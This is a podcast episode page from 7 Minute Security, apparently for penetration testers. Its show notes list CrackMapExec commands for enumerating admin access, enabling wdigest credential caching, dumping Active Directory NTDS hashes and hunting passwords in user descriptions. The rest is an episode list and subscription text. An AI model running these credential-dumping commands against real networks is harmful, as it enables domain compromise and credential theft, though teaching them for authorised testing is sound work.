7 Minute Security10 Maalis 2023

7MS #563: Cracking and Mapping and Execing with CrackMapExec - Part 2

Hey friends, today we're covering part 2 of our series all about cracking and mapping and execing with CrackMapExec. Specifically we cover:

# Enumerate where your user has local admin rights: cme smb x.x.x.x/24 -u user -p password # Set wdigest flag: cme smb x.x.x.x -u user -p password -M wdigest -o ACTION=enable # Dump AD creds: cme smb IP.OF.DOMAIN.CONTROLLER -u user -p password --ntds --enabled # Clean up AD dump output: cat /path/to/file.ntds | grep -iv disabled | cut -d ':' -f1,4 | grep -v '\$' | sort # Check ms-ds-machineaccountquota: cme ldap x.x.x.x -u user -p password -M maq # Check for Active Directory Certificate Services: cme ldap x.x.x.x -u user -p password -M adcs # Pull all AD user descriptions: cme ldap x.x.x.x -u user -p password -M get-desc-users # Pull all AD user descriptions down to a file and search for users with "pass" in description: cme ldap x.x.x.x -u user -p password -M user-desc # CrackMapExec database (CME) ## Clear database sudo rm -r ~/.cme ## Handy commands inside the cmedb prompt: hosts shares creds export shares detailed shares.csv export creds detailed creds.txt

Kokeile Premiumia

Nauti 14 päivää ilmaiseksi

Tilaa Premium

Jaksot(682)

7MS #113: Big Bag of Random Security Stuff

Yep, this episode is EXACTLY what the title implies.

27 Marras 201510min

7MS #112: This is Sparta!

This episode is about one of my favorite enumeration tools called Sparta - it's built right into Kali 2. And maybe it was in Kali 1 and I totally missed it. But whatevs. I'm happy to have found it now!

25 Marras 20158min

7MS #111: Hacking WPA Enterprise-Part 2

The thrilling (?) conclusion of my experience hacking WPA Enterprise.

20 Marras 20156min

7MS #110: Hacking WPA Enterprise-Part 1

This episode is about my experience hacking WPA enterprise. Huge mega tiger uppercut thanks to this site for giving me the fixes I needed to get this working on Kali2! https://warroom.securestate.com/index.php/evil-twin-attack-using-hostapd-wpe/

17 Marras 20158min

7MS #109: OFFTOPIC-It Follows and Backcountry

Movie reviews of It Follows and Backcountry.

13 Marras 20157min

7MS #108: I'm Going to PWAPT!-Part 2

Here's part 2 (of probably several to come) about my experience with PWAPT (Practical Webapp Pentesting) training last week!

11 Marras 201510min

7MS #107: I'm Going to PWAPT!

Hey I'm going to PWAPT this week (http://www.eventbrite.com/e/practical-web-application-penetration-testing-with-tim-tomes-lanmaster53-tickets-16718889649), so in this episode I talk about that...and how I'll probably be too info-overloaded to record anything on Thursday :-). Oh, and I had a fun Web app pentest this week that I wanted to share some fun bits on.

3 Marras 20157min

7MS #106: A Day in the Life of an Information Security Analyst

A listener wrote in asking some questions about "a day in the life of" a security analyst, so here's my best stab at it!

30 Loka 201510min

Kaikki yhdessä sovelluksessa

Kuuntele kaikki suosikkipodcastisi ja -äänikirjasi yhdessä paikassa.

Sinulle valikoitua sisältöä

Podme-sovelluksessa kokoat suosikkisi helposti omaan kirjastoosi. Saat meiltä myös kuuntelusuosituksia!

Jatka kuuntelua koska tahansa

Voit jatkaa siitä mihin jäit, myös offline-tilassa.

Premium

9,99 €/kk

Kaikki premium-podcastit
Ei mainoksia
Ei sitoutumista, peruuta koska tahansa

Aloita 14 päivän kokeilu

Premium

13,99 €/kk

Kaikki premium-podcastit
Ei mainoksia
Ei sitoutumista, peruuta koska tahansa
Yksi lisäkäyttäjä

Kokeile 14 päivää maksutta

Suosittua kategoriassa Politiikka ja uutiset

rss-tasta-on-kyse-ivan-puopolo-verkkouutiset

Tarinat ja äänet, joita rakastat kuunnella

Kuuntele kaikki suosikkipodcastisi ja -äänikirjasi

Lue lisää